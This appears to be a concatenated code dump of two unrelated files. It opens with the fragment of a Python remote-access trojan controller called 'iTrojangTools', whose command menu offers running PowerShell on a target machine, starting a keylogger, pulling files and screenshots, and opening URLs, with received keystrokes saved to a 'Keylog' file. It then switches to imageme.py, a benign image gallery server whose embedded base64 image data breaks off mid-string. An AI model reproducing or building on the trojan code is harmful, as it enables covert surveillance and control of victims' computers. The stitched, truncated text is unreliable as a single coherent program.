print(termcolor.colored(f'[Connection]{connection} Has Joined','green'))
def Recvmsg():
message = connection.recv(4000).decode('utf-8')
print(message)
if message.startswith('k: '):
message.replace('k: ','')
with open('Keylog','wb') as f:
f.write(bytes(message,encoding='utf-8'))
def Download_File(file):
f = open(file,'wb')
chunk = s.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = s.recv(1024)
except socket.timeout as e:
break
s.settimeout(None)
while True:
SendMsg = input(f'[iTrojangToolsV{version}]Run iTrojang Command[!help For Cmd List]>')
connection.send(bytes(SendMsg, encoding='utf-8'))
if SendMsg == '!help':
print('[Command]!Upload <File> | Uploads File To Target Machine[IN PROGRESS]\n'
'[Command]!Download <File> | Downloads File From Target Machine[IN PROGRESS]\n'
'[Command]!Shell <Command> | Run PowerShell on Target Machine\n'
'[Command]!Screenshot | Takes a ScreenShot on Target Machine[IN PROGRESS]\n'
'[Command]!Stopserver | Stops Server\n'
'[Command]!Keylogger | Starts KeyLogger on Target Machine\n'
'[Command]!Open <URL> | Opens a URL in Target Machine\n'
'[Command]!Rickroll | Opens Rickroll on Target Machine'
)
elif SendMsg == '!Stopserver':
sys.exit('[Closed]Server Closed Due To User Closing it')
elif SendMsg[:12] == '!Screenshot ':
file_namefor = SendMsg[12:]
Download_File(file=file_namefor)
elif SendMsg[:8] == '!upload ':
file_name = SendMsg[8:]
Download_File(file=file_name)
t = threading.Thread(target=Recvmsg)
t.start()
s = Server(host='localhost',port=58699)
s.ServerStart()
|
imageme.py | #!/usr/bin/python
"""
imageMe is a super simple image gallery server.
Run imageme.py from the top level of an image directory to generate gallery
index HTML and run a SimpleHTTPServer on the localhost.
Imported as a module, use imageme.serve_dir(your_path) to do the same for any
directory programmatically. When run as entry point, imageme.serve_dir('.') is
what's called.
"""
# Dependencies
import base64, io, os, re, sys, threading, SimpleHTTPServer, SocketServer
# Attempt to import PIL - if it doesn't exist we won't be able to make use of
# some performance enhancing goodness, but imageMe will still work fine
PIL_ENABLED = False
try:
print('Attempting to import from PIL...')
from PIL import Image
PIL_ENABLED = True
print('Success! Enjoy your supercharged imageMe.')
except ImportError:
print(
'WARNING: \'PIL\' module not found, so you won\'t get all the ' +\
'performance you could out of imageMe. Install Pillow (' +\
'https://github.com/python-pillow/Pillow) to enable support.'
)
# Constants / configuration
## Filename of the generated index files
INDEX_FILE_NAME = 'imageme.html'
## Regex for matching only image files
IMAGE_FILE_REGEX = '^.+\.(png|jpg|jpeg|tif|tiff|gif|bmp)$'
## Images per row of the gallery tables
IMAGES_PER_ROW = 3
## Resampling mode to use when thumbnailing
RESAMPLE = None if not PIL_ENABLED else Image.NEAREST
## Width in pixels of thumnbails generated with PIL
THUMBNAIL_WIDTH = 800
## Base64 data for an image notifying user of an unsupported image type
UNSUPPORTED_IMAGE_TYPE_DATA = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAMgAyADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD36iiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA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